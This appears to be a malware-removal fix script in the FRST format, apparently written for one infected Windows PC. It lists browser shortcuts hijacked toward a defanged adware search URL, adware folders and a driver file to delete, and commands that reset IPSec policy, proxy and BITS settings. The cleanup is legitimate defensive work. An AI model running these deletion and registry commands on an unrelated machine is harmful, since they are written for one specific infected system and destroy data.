ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,"
ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk -> C:\program files\internet explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
C:\Users\FAMILY\AppData\Local\brsrv
C:\Program Files (x86)\YTDownloader
C:\Program Files (x86)\PremierOpinion
C:\Program Files\Common Files\ShopperPro3
C:\Users\FAMILY\AppData\Local\BrowserAir
C:\Program Files\Common Files\Goobzo
C:\ProgramData\219d5106-5a99-41fd-b942-db6b503b0178
C:\Program Files (x86)\Common Files\219d5106-5a99-41fd-b942-db6b503b0178
C:\Program Files (x86)\Registry Helper
 C:\Program Files (x86)\Search Web Know
C:\Program Files (x86)\Primary Color
C:\Program Files\WebBar
C:\Windows\System32\drivers\{bfca5c75-b8a6-4c3f-a399-5256dde4bfed}Gw64.sys
C:\Program Files (x86)\OneSystemCare
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
EmptyTemp: 
CMD: bitsadmin /reset /allusers